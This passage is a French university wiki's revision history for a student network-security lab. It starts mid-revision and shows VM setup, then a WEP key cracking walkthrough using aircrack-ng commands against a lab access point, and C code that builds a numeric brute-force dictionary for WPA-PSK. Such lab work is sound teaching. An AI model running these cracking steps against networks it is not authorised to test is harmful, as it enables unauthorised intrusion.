 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52773</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52773"/>
				<updated>2020-10-15T10:21:40Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52772</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52772"/>
				<updated>2020-10-15T10:21:18Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52765</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52765"/>
				<updated>2020-10-15T10:11:03Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52762</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52762"/>
				<updated>2020-10-15T10:02:58Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52761</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52761"/>
				<updated>2020-10-15T10:02:44Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52760</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52760"/>
				<updated>2020-10-15T10:00:55Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52759</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52759"/>
				<updated>2020-10-15T10:00:42Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  airmon-ng&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	</feed>